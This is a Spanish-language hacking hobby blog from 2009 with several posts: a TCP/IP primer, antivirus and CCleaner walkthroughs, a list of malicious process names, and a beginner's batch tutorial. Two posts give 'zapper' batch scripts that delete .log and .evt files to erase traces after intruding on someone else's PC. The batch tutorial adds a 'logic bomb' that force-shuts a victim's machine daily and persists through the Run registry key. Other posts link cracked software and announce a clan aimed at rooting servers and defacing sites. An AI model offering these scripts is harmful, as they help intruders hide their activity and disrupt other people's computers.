Bueno, me propongo hacer este tutorial, debido a que recien termine de estudiar este tema por que queria entender (algo ) acerca del funcionamiento del Nmap ( para los que no saben que es, busquen en google )...
Este capitulo de Hacking, puede resultar algo aburrido ya que es todo teorico, pero es escencial para saber como funciona internet, o por lo menos tener una breve idea acerca de su funcionamiento.
Bueno Comenzemos:

Protocolo TCP/IP (Comienzo)

TCP: Es algo complicado, pero aver si lo podemos resumir en algo entendible para los principiantes.
Se lo podria definir como: Conjunto de reglas para la conexion entre computadoras

IP: ( lo veremos a fondo mas adelante)
Por ahora diremos que es un Protocolo que se encarga del direccionamiento de los archivos

Esto parece facil de comprender, pero engloban mucha complejidad ( imagina que hay libros enteros acerca del protocolo TCP/IP)

Juntos los protocolos TCP y el IP (TCP/IP) forman un conjunto de protocolos estandares para la comunicacion entre computadoras. Cada uno tiene una funcion determinada.

TCP ----> Flujo de datos
IP ---> Direccionamiento de dichos datos

Los protocolos TCP/IP, se conforman de 4 capas:

Interfaz de Red: Se encarga de extraer o introducir los datos del medio fisico. Ej: Cuando queremos mandar algun archivo, la Interfaz de red se encarga de extraer los Bits que conforman al archivo del disco Duro.

Capa de Red ( 2 da capa): Capa que se encarga ( una vez que la Interfaz de red halla finalizado su trabajo) de EMPAQUETAR, DIRECCIONAR, REPORTAR LOS ERRORES ---> Esta capa se compone de varios Protocolos. (3)

1) IP: Se encarga del direccionamiento de paquetes (datos), sabe de donde viene, y hacia donde va a ir un paquete

2) ARP: Obtiene las direcciones de hardware de los nodos localizados en el mismo segmento

3) ICMP: Se encarga de reportar todos los errores y mandar mensajes respecto a la transmision de los datos ( es decir si llegaron a su destino )

Capa de transporte ( 3ra capa): Capa que se encarga de montar conexiones entre dos nodos. Se encarga de suministrar la conexion entre 2 equipos.
Ej: Cuando un visitante ingresa a una pagina web, esta estableciendo una conexion con otro ordenador que no es suyo

Esta capa ( capa de transporte ), se compone de 2 Protocolos

TCP: Protocolo orientado a conexiones confiables, conexiones que requieren transeferir una gran cantidad de datos

UDP: No esta orientado a conexiones. Su trabajo es solo transferir pequeñas cantidades de datos.

¿ Como sabe una capa que paso en la anterior ?

Supongamos que la primera capa ( interfaz de red ) accede al medio fisico a extraer los datos que seran enviados a la segunda capa... ( la capa de red )
La segunda capa ( capa de red ), ¿como sabe si hubo un error en la primer capa?.
Bueno facil, la primer capa en este caso, inserta toda la informacion de lo que ha pasado en esa capa, en una cabecera y esa cabecera, es dirigida a la segunda capa.
La segunda capa, lee la cabecera, interpreta los datos, borra la cabecera y crea una dependiendo lo que haya pasado en la segunda capa para enviar los datos a la tercer capa (capa de transporte)
y asi sucesivamente

Ahora si, lo que todos estabamos esperando...

¿ Que es una IP ?

IP: Direccion para identificar un equipo que se conecta a internet...
Hay diferentes tipos de direcciones IP.
Dinamicas, estaticas (no lo veremos en este manual, ya que no es el objetivo del mismo, ver los distintos tipos de direccion IP )

Cabe destacar:

No todas las IP se unsan para lo mismo, bueno si, todas se usan para conexiones, pero no todas para el mismo tipo de conexiones, algunas son publicas o externas, otras son internas o privadas.

¿¿Como diferenciar una de otra??

Pues hay rangos especificos que se pueden usar en internet (estas son casi todas y se les conoce como ip externa o publica porque en internet todos con los que te conectes la podran ver) ademas, no es posible que 2 pc se conecten a internet con la misma ip, todas son diferentes.

IP privada o interna: Estas se usan para intranets, redes comunes como la de tu escuela, la del ciber donde suele haber recursos compartidos ( ya sabes de lo que estoy hablando, te suena tutorial COMO PROTEGERSE DE NETBIOS? ) estas redes utilizan para cominicarse, una ip privada que solo funciona en esa red, por lo regular la IP es del rango 192.168.1.xx x este rango de IP es especial para intranets. es decir que es un rango de IP privada, estas no sirven para conectarse a internet. por ejemplo en una red normal por lo regular el servidor tiene la ip 192.168.0.1 y las pc siguientes serian la 192.168.0.2 --- 192.168.0.3 .
Ahora, se entendera mucho mejor con la imagen de una red ( pongamosle de ejemplo un ciber )

Bueno el servidor, es la maquina del root del ciber ( la que maneja el tiempo y todo eso)
y las demas son las que usan los users cuando pagan 2$ la hora para ver el msn xD
como vemos, todas las pc's siguen una serie de patrones logicos
¿a que te referis pelotud....? se estaran preguntando... Pongamos atencion;
Servidor ---> 192.168.0.1 ----> 192.168.0.2 -----> 192.168.0.3 ----> 192.168.0.4 -----> etc

Siiiiiiiiiiiiiii !!!!!!! ahora sabemos cual es la ip interna de una pc y ensima sabemos cuando esta en red ( ¿ya somos hackers Dr [F]? ) no mis ignorantes amigos,, xD aun queda mucho por recorrer

Bueno, como dije esto es lo basico, algun otro dia, seguire hablando de este interesante protocolo
( queda muchisimo por ver )

El Dr [F]

Implementacion de CCleaner y Dr Web

2009-10-21T16:29:00.000-07:00

Antes que nada.. A las imagenes se las puede ampliar con un Click (y)

Hola, en este mismo momento, le estoy pegando una llamadita a mi proveedor de internet.. ( fibertel )
y se mas que el cordobes que me esta hablando xD...

bueno...
Me propongo hacer un tutorial simple acerca de como se usan las siguiente Herramientas de Escaneo...

Dr Web CCleaner

Dr Web:

Dr. Web es una lucha popular-suite virus desarrollada por Rusia IT-Doctor proveedor de soluciones de seguridad Web. It was first released in 1992, and become the first anti-virus service in Russia. Fue lanzado por primera vez en 1992, y convertirse en el primer servicio de lucha contra el virus en Rusia.

Segun Wikipedia...

CCleaner:

CCleaner es una aplicación gratuita, de código cerrado (software no libre), que tiene como propósito mejorar el rendimiento de cualquier equipo que lo ejecute mediante la eliminación de archivos innecesarios, entradas inválidas del Registro de Windows y también cuenta con la posibilidad de desinstalar programas desde su interfaz al igual que inhabilitar la ejecución de aplicaciones en el inicio del sistema con el fin de mejorar la velocidad de arranque del sistema operativo.

Segun Wikipedia

Antes de empezar este tutorial, el CCleaner se lo pueden descargar de aqui http://rapidshare.com/files/296130366/ccsetup224.exe.html (link subido por mi)
o lo tienen de Softonic...
http://ccleaner.softonic.com/descargar#pathbar

El Dr Web .. lO PODEMOS descargar de http://www.freedrweb.com/cureit/

Ahora a lo importante..
Como usarlos.

Primero El Dr Web:

En esa página, buscamos el siguiente cuadro de descarga, y pinchamos en él:

Esto, nos conducira a otra pagina donde tendremos que aceptar los terminos y condiciones que tenemos a la vista

Tras este paso, se iniciará la descarga, el progama debemos GUARDARLO (elegir esa opciópn en el navegador) en el lugar que deseemos.
Al finalizar la descarga, en el lugar donde hayamos elegido guardarla, deberá quedarnos un archivo .exe el nombre exacto varía, pero siempre son letras y numeros::

Analisis y desinfeccion de Malware

1) Bueno ahora comenzemos con la desinfeccion de nuestro PC...
Demosle 2 clicks a la arañita caracteristica , nos aparercera una ventanita en color verde y un cartel para bajar actualizaciones. al cartel le damos cancelar y le damos a Iniciar:

Ahora imagen en la que se da click en iniciar

Luego seleccionamos que tipo de escaneo queremos que haga el programa HAY tres opciones ( las cuales se pueden ver claramente) xD y le damos a iniciar

Ahi vemos que comenzo/termino (nu me acuerdo xD ) a escanear ya

No se encontraron virus ( qe suerte ) xD

Si no se encontraron Virus...
PD: Si se encuentra algun virus.. eliminalo (si no sabes como pregunta y respondere pero es facil xD )

Espero que este tuto te haya servido... ahora veremos el tutorial del CCleaner

CCleaner

Bueno, supongo que tenemos instalado el CCleaner en nuestro pc listo para usar...

Hacemos doble click en nuestro querido icono del CCleaner

nos aparecera un menu y varias opciones de la mano izquierda. Nosotros nos enfocaremos en la opcion de herramientas y registro

Y por ultimo eliminando los daños encontrados en la zonas escaneadas :::

Espero que les halla gustado el tutorial 100% echo por mi
PD: Si roban las imagenes aclaren de donde la sacaron ok ?

By Dr [F]

Esta lluvia de mierda :P
Marian (y)

Zapper en progreso

2009-10-21T14:07:00.000-07:00

Bueno, con Dr F se nos ocurrio hacer un zapper, y yo habia visto un code hecho por 3D1 que buscaba todos los .exe del disco local, los almacena y luego los ejecuta a todos de una sola vez :P Lo que hicimos fue modificarlo un poco para que busque los archivos .log del disco local y luego eliminarlos para no dejar rastro alguno de lo que hallamos hecho cuando nos entramos en la PC de alguien ^^

@echo off
cd /d %HOMEDRIVE%\
for /f "tokens=*" %%_ in ('tree /F^|findstr /e /i ".log"') do (
for %%- in (echo %%_) do (
if "%%-" NEQ "³" ( if "%%-" NEQ "echo" (
Del /S /Q /F %%-
rem Grax 3D1!
exit

ese es el code que modificamos, lo que hace falta es compilarlo en C para que sea indetectable. Saludos a todos ;)

¿Que es un zapper?

Zapper: es un archivo autoejecutable que se llama cuando desde tu pc cuando te introduces en la PC de otra persona para eliminar todos los registros de que estubistes ahi.

Saludos. Sthefano02

Procesos Malignos

2009-10-19T13:24:00.000-07:00

Bueno, como todos sabemos, todo sistema operativo corre procesos para su funcionamiento normal.
Sabes como ver los procesos... ¿Escuchaste alguna vez el tipico CTRL+ALT+SUPR, bueno es lo que hacemos para ver los proceso que corren en nuestro ordenador :d

-Aquí esta una lista de los varios peligrosos si ves uno de estos procesos pues "obvio tienes un virus" ---> PD: Pregunta acerca de como eliminarlos, ya que si los coloco aka los manuales see haria re denso el post.

* absr.exe (Virus AUTOUPDER)
* aconti.exe (DIALER)
* adaware.exe (spyware RAPIDBLASTER)
* adobes.exe (Virus FLOOD.BA)
* adp.exe (spyware, Se instala con Net2Phone, Limewire, Cydoor, Grokster, KaZaa, etc)
* Advapi.exe (Virus NETDEVIL.12)
* backweb.exe (Backweb Adware, muestra publicidad)
* bargains.exe (spyware que se instala con Net2Phone y LimeWire.)
* bndt32.exe (virus LACON)
* boot.exe (virus ELEM)
* bpc.exe (spyware que se instalar con GROKSTER)
* brasil.exe (virus OPASERV.E)
* cekirge.scr (virus KERGEZ.A)
* cmd32.exe (virus P2P.TANKED)
* cme.exe (spyware parte de GATOR)
* cmesys.exe (spyware parte de GATOR)
* cnbabe.exe (spyware)
* comcfg.exe (virus TOADCOM.A)
* command.exe (virus QQPASS.E)
* cpumgr.exe (virus PANDEM.B)
* ct_load.exe (virus OPASERV.E)
* ctbclick.exe(spyware)
* cuo.exe (virus BUGBEAR)
* ddhelp32.exe (virus BIONET.318)
* desire.exe (un dialer conecta con webs porno llamando a un 906)
* directx.exe (virus SDBOT.D, BLAXE o LOGPOLE)
* dlder.exe (Se instala con Bearshare, LimeWire, Grokster, Net2Phone, Kazaa)
* dlgli.exe (muestra publicidad)
* dllmem32.exe (virus KWBOT.E)
* dllreg.exe (virus NIBU, BAMBO o DUMARU)
* dssagent.exe (spyware)
* dw.exe muestra(publicidad)
* dxupdate.exe (virus MAFEG)
* enbiei.exe (virus BLASTER.F)
* expl32.exe (virus RATSOU, HACKTACK)
* explore.exe (virus GRAYBIRD.G, NETBUS o HAWAWI)
* fhfmm.exe (spyware)
* flydesk.exe (spyware)
* gain_trickler_exe (se instala con varios programas)
* gator.exe (se instala con varios programas)
* gmt.exe (se instala con varios programas)
* hcwprn.exe (spyware)
* helpctl.exe (virus GASLIDE)
* https.exe (virus MOEGA.D)
* hxdl.exe (spyware que se instala con ATTUNE, complemento de muchos programas)
* hxiul.exe (spyware que se instala con ATTUNE, complemento de muchos programas)
* icon.exe (virus RAPIDBLASTER)
* ide.exe (virus ASSASIN.F)
* iedll.exe (modifica opciones en el internet explorer)
* lexplore.exe (virus OBLIVION.B)
* iexplore32.exe (virus SPEX)
* iexplorer.exe (virus LORSIS o RAPIDBLASTER)
* internet.exe (virus MAGICCALL)
* ipmon.exe (virus RECERV)
* isass.exe (virus OPTIX PRO)
* kern32.exe (virus BADTRANS.A)
* kernel32.exe (virus BABYLONIA, KERNEL, KICKIN.A, TENDOOLF o HOOKER)
* kkcomp.exe (spyware)
* kvnab.exe (spyware)
* liqad.exe (spyware)
* liqui.exe (spyware)
* load32.exe (virus NIBU,BAMBO o DUMARU)
* isem.exe (spyware PURITYSCAN)
* lycos.exe (Desconocida)
* messenger.exe(virus KUTEX)
* mp3search.exe(spyware LOP.COM)
* mptask.exe (virus LALA, DOWNLOADER-BN.B o AOT)
* msbb.exe (spyware que se instala con varios programas, muestra publicidad)
* msblast.exe (uno de los mas famosos de los ultimos tiempos.)
* mscom32.exe (virus BESTY.H)
* msiexec16.exe(virus OPTIX PRO)
* mslaugh.exe (virus BLASTER.E)
* mslogon.exe (spyware)
* msnet.exe (virus SDBOT o BOA)
* mstask32.exe (virus YAHA.P)
* mstray.exe (virus WUKILL.A)
* nabv32.exe (virus TITOG.C)
* netd32.exe (virus RANDEX.F o SDBOT.R)
* newsupd.exe (spyware)
* njgal.exe (virus KILO)
* npnsdad.exe (spyware)
* npnzdad.exe (spyware)
* nstask32.exe (virus RANDEX.E)
* owmngr.exe (spyware, cambia la configuracion de internet explorer, muestra publicidad)
* rb32.exe (virus RAPIDBLASTER)
* rcsync.exe (muestra publicidad)
* realevent.exe(muestra publicidad)
* realsched.exe (se instala con real one player, ralentiza el sistema)
* real-tens.exe (spyware)
* regcmp32.exe (virus POLDO.B)
* registry.exe (virus DOWNLOADER.CILE)
* regloadr.exe (virus GAOBOT.AO)
* regscanr.exe (virus OPTIX LITE FIREWALL BYPASS)
* regsrv.exe (virus OPTIXPRO.11)
* run_cd.exe (virus GHOST.23)
* runapp32.exe(virus NEODURK)
* rundli32.exe (virus LADE)
* rundll16.exe (virus SDBOT.F)
* savenow.exe (virus SPREDA.B;)
* svchosl.exe (virus GAOBOT.P)
* svchosts.exe (virus SDBOT)
* svch0st.exe (virus GRAYBIRD)
* synchost.exe (virus RIP JAC)
* sysconf.exe (virus SDBOT)
* sysldr32.exe (virus GAOBOT)
* sysreg.exe (cambia la configuracion del internet explorer y muestra publicidad)
* system.exe (virus CHILI, NULLBOT, FULAMER.25, GATECRASH.A)
* systray32.exe (virus DABOOM)
* tasktray.exe (spyware)
* teekids.exe (virus BLASTER.C)
* ttps.exe (cambia la pagina de busqueda del internet explorer, muestra publicidad)
* virus_cleaner.exe (virus PANOL)
* wanobsi.exe (modifica la pagina de busqueda del internet explorer)
* win32_i.exe (spyware)
* win32API.exe (cambia la pagina de inicio del internet explorer)
* win32us.exe (se conecta con webs pornograficas)
* wincfg32.exe (virus SILVERFTP)
* wincomp.exe (TROYANO)
* windex.exe (virus GAOBOT.BM)
* windfind.exe (DIALER)
* windll.exe (virus TRYNOMA, STEALER)
* windll32.exe (virus MSNPWS, ASTEF, RESPAN)
* windows.exe (virus QQPASS.E, KAZMOR, BOBBINS ALADINZ.D)
* winhelp.exe (virus LOVGATE.G)
* winkrnl386.exe (virus ZEBROXY)
* winmgm32.exe (virus SOBIG, LALAC.C)
* wininit.exe (virus BYMER)
* winlogin.exe (virus RANDEX.E)
* winnet.exe (es uno de los peores spywares, se instala con imesh)
* winserv.exe (parte de intelligent explorer)
* winservices.exe(virus YAHA.K, YAHA.M)
* winservn.exe (spyware)
* winsys32.exe (virus CIGIVIP, RECKUS)
* winsystem.exe (virus WHITEBAIT)
* wintask.exe (virus HIPO, NAVIDAD, LEMIR.F)
* winupdate.exe (virus BMBOT, RADO)
* winz32.exe (virus KWBOT.Z, SDBOT.Q)
* wnad.exe (spyware que muestra publicidad)
* wupdated.exe (virus MOEGA)
* wupdt.exe (parte de intelligent explorer)
* xadbrk.exe (spyware )

Aca pueden consultar muchas cosas... :D
http://www.infoprocesos.com/

Espero que tengan suerte.. :D

El Dr [F]

Borrando Huellas en windows

2009-10-19T02:17:00.000-07:00

Hola, como vi que nadie posteaba hace mas de un dia, y tengo tiempo al dope, me digno a hacer este posteito, como ya sabemos, cada vez que usamos nuestro querido SSS, Nessus, Nmap, etc o bien nuestros queridos troyanos, dejamos pequeños rastros, que confirman que estubimos ahi.
esos archivos que confirman nuestra existencia tienen una extension en .log.

los logs se encuentran en :

Panel de Control ---> Herramientas Administrativa s----> Administracion de equipos ---->Visor de sucesos----> Seguridad

Bueno, ahora que sabemos donde se encuentran los logs, fijemosnos en que carpeta estan, para hacer nuestro propio zapper:D

sera esa nuestra ruta... ?

Bueno ahora vamos a hacer nuestro zapper...
como sabemos, tenemos que eliminar los .logs y los .evt de esta carpeta

C:\WINDOWS\System32\config

entonces empezemos con nuestro Zapper, pero antes, muchos se lo estaran preguntando xD
¿Que es un Zapper ?

Es un archivo que borra los .log y los .evt que se dejan cuando ingresamos a un ordenador ajeno ( segun yo )xD

Código:

@echo off
if exist %windir%\System32\config (goto :a) else goto :b
:b
exit
:a
del /f /s /q *.evt
del /f /s /q *.log
ATTRIB -R -A -S -H
ping 127.0.0.1 -n 40
del /f /s /q %0
exit

Asi creo que estaria bien, cabe destacar que hay zappers muchos mas complejos, la verdad nunca vi un zapper ( por eso la idea barata de arriba) xD

Espero que hayan disfrutado el tutorial

espero que comenten ya sea positiva o negativamente , cualquier cosa es bueno para aprender.

PD: PODES HACER CLCIK EN LAS IMAGENES PARA AGRANDAR

Aceptacion Confirmada!

2009-10-18T16:41:00.000-07:00

Hola, yo de nuevo, esta vez les queria informar que fui aceptado en un Clan de Hackers.. se hace llamar W.A.R ( sus iniciales, se ignifica, WE ARE ROOTS).
Estoy muy contento de que me hallan aceptado en este clan...
Los administradores de este clan son:

Messerschmitt
Zero Q

Muchas gracias x todo, estoy muy agradecido

La finalidad de este clan es:
Rooteo de servidores
Deface ( solo a los que esten en nuestra contra )
Ayudar a convatir la pornografia infantil
Instalaremos un centro de Ayuda ( para que usuarios de la red consulten sus problemas)
Tambien se intentara ayudar a empresas de seguridad via online

Muchas gracias x todo

Dr [F]

Nod32 4.0.314.0 Full

2009-10-17T19:08:00.000-07:00

Bueno, soy sthefano02 otra vez xD ahora que tengo el permiso de Dr F voy a postear mas seguido... hoy les traigo el NOD32 Antivirus 4.0.314.0 Full!!!

Datos:

Tamaño: 33 mb
Comprension: .rar
Licencia: Medicina incluida(manual en descarga aparte)

Pass: foroportalhack er.net

Click Aqui Para Descargar

Datos: Es un antivirus del tipo residente

Nos en conveniente tener mas de un antivirus residentes en el mismo ordenador ya que podria causar algunos lios..

Es importante saber que existen dos tipo de antivirus

Escaneo: Se utilizan nada mas para el escaneo de algunos archivos.. no esta en constante vigiliamiento del ordenador MalWare Bytes, CCleaner

Residente: Esta en constante vigilamiento de nuestro PC ej: Nod32, Avg, Avast

Saludos y que disfruten ;)

Tutorial para principiantes de Batch

2009-10-17T12:20:00.000-07:00

Hola, muy al dope en casa, me propongo hacer este tutorial para principiantes en Batch.. Espero que lo drifuten :D

Empezemos por lo basico...

¿Que es batch?

Si queres te puedo decir que no es Batch. Batch no es un lenguaje de programacion en si. Sino un archivo de procesamiento por lotes que permite utilizar comandos de CMD (o simbolo de sistema o consola negra que a los que no saben nada les da tanto miedo).
Para programar en batch, necesitaremos el Block de notas o cualquier tipo de editor de texto plano. NO usen ningun editor de texto como word o wordpad porque eso ya no es texto plano sino enriquesido y no funcionaria.
Como compilador, podremos usar el block de notas...

Codigos basicos y pequeñas practicas

Como nuestro primero paso... ingresamos al bloc de notas...
Inicio--->todos los programas---->Accesorios----->Bloc de notas

Una vez que ya sabemos como ingresar al bloc de notas ( nuestro compliador ) ya nos podremos llamar super Juankers xD..
Los comandos basicos de Batch son los siguientes:

 *ECHO: imprime un texto en pantalla
*@ECHO OFF: oculta los comandos que programamos para que cuando se inicie el bat no se puedan ver los codigos y solo el programa.
* DIR: muestra un listado con el contenido de un directorio.
* TYPE: muestra el contenido de un archivo en pantalla.
* COPY: copia archivos en otro lugar.
* REN (RENAME): renombra archivos.
* DEL: borra uno o varios archivos (con posibilidad de recuperarlos mediante la orden UNDELETE, salvo que el lugar del archivo o    archivos borrados hubiese sido utilizado con posterioridad).
* MD o MKDIR: crea un nuevo directorio.
* CD o CHDIR: cambia el directorio actual por el especificado.
* RD o RMDIR: borra un directorio vacío.
* DELTREE: borra un directorio con todo su contenido, incluidos subdirectorios (apareció en las últimas versiones)
* CLS: limpia la pantalla.
* HELP: ayuda sobre las distintas órdenes.
* SORT: ordena Datos
*SHUTDOWN: apaga el ordenador

Bueno, ahora, abre nuestro super compliador ( nuestro bloc de notas ) y comenzemos a practicar:

Escribe esto:

@echo off
title Primer Programa
echo Presiona una tecla:
echo Wenas
pause>nul
exit

Recuerda! esto guardalo como
elnombrequequieras.BAT... no necesariamente en mayusculas, pero el .bat es fundamental para el funcionamiento del programa



screnn de como queda el programa !

ahora... sabras que significa el codigo que copiaste...

@echo off:
Este codigo lo que hace es ocultar todos los comando que vas a utilizar
en el programa, sino nos apareceria lo que pusimos y la victima se
daria cuenta de que es un virus en caso de que lo sea.

title:
este es el nombre que aparece en la ventana del MS-DOS cuando ejecutas el programa.

echo:
Sirve para mostrar en pantalla o imprir datos.
Ej: echo Franco
mostrara por pantalla Franco

pause:
Interviene en el programa creando una pausa que se va cuando tocas alguna letra

echo: Ya sabemos

pause>nul:
esto es lo mismo que lo anterior pero unicamente que no muestra el
cartel en la pantalla que dice "presione un tecla para proseguir"

exit: Sale de la consola de MS-DOS

Variables

DEFINICION

Las variables se usan en la mayoria de los lenguajes de programacion. Son datos que pueden ir cambiando a medida que el programa corre ( como su nombre lo indica son variables) xD. Las variables pueden adquirir diferentes valores letras y numeros, tambien se nos permite sumar variables o imprimirlas en pantalla. O incluso realizar operaciones matematicas.

Cuando llamas una variable en batch siempre se encierran entre "%" por ejemplo tenemos la variable zero, cuando la llamamos seria %franco%

Go Practica:

@echo off
title Welcome to variables exercise:
echo Presiona una tecla para continuar
pause>nul

set /p nombre=como te llamas?
set /p edad=cuantos anios tenes?
set /p comida= que comes?
pause > nul
echo hola %nombre%
echo veo que tienes %edad% anios verdad?
echo como te puede gustar %comida%?
pause > nul
exit

Ahora a examinar el code...
hasta pause>nul ( el primero ya sabemos )

set /p loquesea:
Con esto estamos haciendo que el archivo le pregunte al usario el valor de la variable nombre. Set es el comando para llamar variables.
/p significa que el usuario le pondra el valora la variable por medio de una pregunta.
"nombre" ahi esta el nombre dela variable.
"=como te llamas?" es la pregunta que se le hara al usuario.

echo hola %nombre% veo que tienes %edad% años verdad? como rayos te puede gustar %comida%? XD

Aqui se imprimen los datos en pantalla un texto usando las variables, como mencione al principio
las variables se llaman entre "%". Entonses el batch imprimira en
pantalla el valor de las variables nombre, edad y comida adicionadas.

Variables de entorno

Hay tipos de variables, que nos ayudan a la hora de crear nuestros programas y virus y que suben mucho la probabilidad de que el programa tenga exito.. a estas variables, las llamaremos variables de entorno, vienen por defecto, y sirven para indicar una ruta.
Por ejemplo:
todos conocen esta ruta:
C:\WINDOWS\SYSTEM32.. Una variable de entorno puede hacer esto:
%windir%\system32 .. es lo mismo que poner lo de arriba
pongamosle, que en un virus esta C:\WINDOWS\SYSTEM32... imaginense si el windows lo tiene en el disco d:\ u en otro disco... El virus ya estaria mal empezado y no funcionaria...
la variable de entorno hace la accion que le indiquemos directamente en la carpeta que le indiquemos en este caso %windir%=windows
¿SE ENTIENDE?
Ahora con la practica lo entenderan

Las variables de entorno mas importante son las siguientes:

%ALLUSERSPROFILE% ------> todos los usuarios
%APPDATA% ---------> datos de programa
%PROMPT%%TEMP% y %TMP% ---------> temporales
%USERDOMAIN% -----------> obtener dominio
%USERNAME% --------------->nombre del usuario Actual
%USERPROFILE% ---------------> usuario configuracion
%programfiles% ---------------> archivos de programas
%systemroot% ----------------> windows
%homedrive% --------------> disco Raiz

Ejemplo de batch que ejecute el notepad o el bloc de notas

@echo off
echo Ahora se ejecutara el bloc de notas
%windir%\system32\notepad.exe
pause>nul
exit

Bueno... Empezemos con los que algunos estaban esperando...

Bombas logicas y Virus en Batch

Pero primero, ¿Que es una bomba logica ?

Una Bomba lógica es una parte de código insertada en un programa informático intencionadamente que permanece oculto hasta cumplirse una o más condiciones preprogramadas, en ese momento se ejecuta una acción maliciosa.

Algunos programas maliciosos como virus informáticos o gusanos informáticos suelen contener bombas lógicas que ejecutan una acción en una fecha determinada o al darse alguna condición. Para ser considerado bomba lógica, la acción ejecutada debe ser maliciosa o desconocida para el usuario. Por ejemplo los programas demos, que de desactivan pasado un periodo de tiempo, no son considerados bombas lógicas.

Segun wikipedia

Ahora, enseñare como crear una bomba logica ( muy basica) con el comando AT

Mira este code, te va a gustar... :P

shutdown -s -f -t 05 -c "Hola"

¿Que hace?... apaga el ordenador...
-s : sirve para darle la orden a la pc que se tiene que apagar
-f fuerza el cierre del ordenador cerrando los proceso que normalmente no lo dejan apagar
-t es en el tiempo que queres que se apage
-c deja un comentario siempre va entre comillas

Este comando se cancela poniendo shutdown -a

Entonces creemos un batch que a las 9 pm apage la pc de nuestra "victima" xD

@echo off

AT 17:00 shutdown -s -f -t 2 -c "Jodete" >> c:/windows/system32/windosx.bat

REG ADD HKML\software\Microsoft\Windows\CurrentVersion\Run /v franco2

/t REG_SZ /d "c:/windows/system32/windosx.bat"
exit

Logicamente , lo que haria esto, es apagar el ordenador de nuestra victima, a las 17:00 y agregarse
al registro. osea apagarse todos los dias a las 5 PM

Aplicacion de IF a las variables en menues

@echo off
:menu
echo 1. ping a google
echo 2. ping a wikipedia
set /p var=a quien quieres hacer un ping??

if %var%==1 (goto goo)
if %var%==2 (goto wiki)
if %var%=="" (goto menu)

:goo
ping www.google.com
pause
goto menu

:wiki
ping www.wikipedia.com
pause
goto menu

Explicaremos la nueva parte del code:
if %var%==1 (goto goo)
ponemos %var%, por que es la variable que declaramos arriba (set /p var=). ¿Se entiende ?
ponemos cuando la variable sea uno vaya a :goo
if %var%=="" (goto menu)... Esto, Cuando se ingrese algun dato que no sea 1 o 2 volvera al menu..

Bucles

Los bucles son comandos, que se realizan muchas veces, indefinidamente. Los bucles ( en batch )
se realizan facilmente...
Probemos...

@echo off
:bucle
echo Hola World
goto bucle

Esto, se ejecutara infinintamente, hasta que el programa se cierre...
( Esto nos da muchas ideas ) xD

Esto tambien se puede mezclar con variables y con sentencias condicionales ( IF )
Un Ejemplo con todo; ?


@echo off
set var=20
:bucle
if %var%==0 (goto exit) else set /A var=%var%-1
echo Wenas franco
goto bucle
:exit
echo hola
pause
exit

Automatizacion de tareas

El comando AT, permite que se realize una determinada tarea ( que sabemos nosotros) a alguna
determinada hora ( la que este escrita en el code ) o en un determinado dia o mes, etc

Un ejemplo del comando AT:

@echo off
AT 19;00 shutdown -s -f -t 10 -c " Franco"
exit

Para los newbies si no saben como borrar las tareas
AT /delete

Comandos de red:

Este tema lo voy a pasar muy por arriba, es mas solo dare los comandos.. Espero que sepan entender..

FTP
Iniciar el cliente ftp

IPCONFIG parámetros
Mostrar las características de configuración de IP
   /all -> muestra toda la información de configuración
   /release adaptador -> libera la ip del adaptador especificado
   /renew adaptador -> renueva la ip para el adaptador especificado
   /flushdns -> purga la caché de resolución de dns
   /registerdns -> actualiza las conexiones dhcp y vuelve a registrar los nombres dns
   /displaydns -> muestra el contenido de la cache de resolución dns
 
NBTSTAT
Hace un estado de la red por netbios
Tiene muchos parámetros. Consultarlos mediante nbtstat /?

NET parámetros
Comando para el uso de redes netbios
   USE \\equipo\recurso -> para acceder a unidades lógicas compartidas. Se le asignará un nombre de unidad y estará disponible como una unidad mas del sistema.
   USE \USER: dominio\usuario para acceder a un dominio
   USE unidad /DELETE eliminar el acceso a unidad compartida.
   SHARE trayecto /REMARK texto -> para compartir un recurso en red
   START -> para comenzar sesión netbios
   STOP -> para detener netbios

NETSTAT
Para ver el estado de la red.
   -a -> mostrar todos los puertos y conexiones
   -n -> mostrar números de puertos y direcciones
   -r -> mostrar la tabla de rutas
   -s -> mostrar estadísticas por protocolo
   -p protocolo-> protocolo puede ser tcp o udp. muestra las conexiones activas

NSLOOKUP dominio
Muestra el dominio, su ip, dns donde se resuelve y sus alias

PING
Enivia paquetes a un host para comprovar su disponibilidad

TELNET ip puerto
Utilizar el protocolo telnet para acceso a un servidor exterior

TRACERT destino
muestra el camino que se toma hasta llegar a la ip

Por ahora esto es todo, voi a seguir maniana.... :D nos vemos

Tristelme... Hacked xD

2009-10-17T08:32:00.000-07:00

El boludismo humano

Que lammer por dios...

Esto es lo que nunca se debe hacer en el mundo del hacking...
aparte ni es hackear.. fue obtener la password
si buen fue muy comico en el momento, con el tiempo te das cuenta que es de mala gente y de garca... Espero que nadie tenga rencor todavia...
PD: password= pechofrio

Esto que sigue, es algo que me llamo mucho la atencion en su momento.. por eso me lo guarde en mi pc y ahora lo posteo para que vean como piensa la sociedad de nosotros.

Me gustaria que vieran la imagen por su cuenta ya que no sale entera :s
les dejo en link y opinen

http://img18.imageshack.us/img18/2113/logica.png

En la ultima parte, dice la logica de un hacker...
Concpeto totalmente erroneo, debido a que los hackers brindan seguridad y reportan los errores que encuentran en un sistema
Es mas si no hubiera hackers no habria internet y si se hubiera creado internet, estaria echo una pena de inseguridad
Yo ya recapacite, me gustaria que lo intentaran ustedes

Wga Cracked

2009-10-16T14:38:00.000-07:00

WGA Cracked

Bueno, hay gente a la que le sale cada vez que inicia su PC o habre algun programa del Office (windows) una notificacion diciendo que su paquete no es original. y no hay forma de quitarlo xDDD, lo que hace WGA Cracked es quitar esas notificaciones tan molestas y odiosas de nuestro PC.

Podran descargarlo de este link:
http://exponelo.com/files/03ROUBDT/WGA.Cracked.rar

Una vez descargado saldra una imagen como esta

Le dan siempre a Next y next y next xDDD has finalizar la instalacion

Cuando terminen de instalar reinician la PC y listo, las notificaciones abran desaparecido ^^

Saludos a todos y espero que les sirva :)

By: Sthefano02

Mi perfil de CPH :P

¿AntiVirus destruccion del mundo?

2009-10-16T02:18:00.001-07:00

Hace 6 meses el antivirus AVG se cansó de los estúpidos usuarios y se puso como loco a borrar user32.dll. La cantidad de llamadas a la centralita de AVG tuvo que ser importante, un DDoS telefónico.

*DDoS: Denegacion de servicios... Bien echo produce un colapso en el sistema operativo, dejandolo inactivo, tanto tiempo como dure el ataque

*USER32.DLL: User32.dll es una biblioteca del enclace dinamico (DLL) que implementa la biblioteca de clientes de API de usuario de Windows. Es un archivo principal para varias versiones del SO de Microsoft windows Si este archivo está dañado o eliminado, el sistema operativo no funcionará

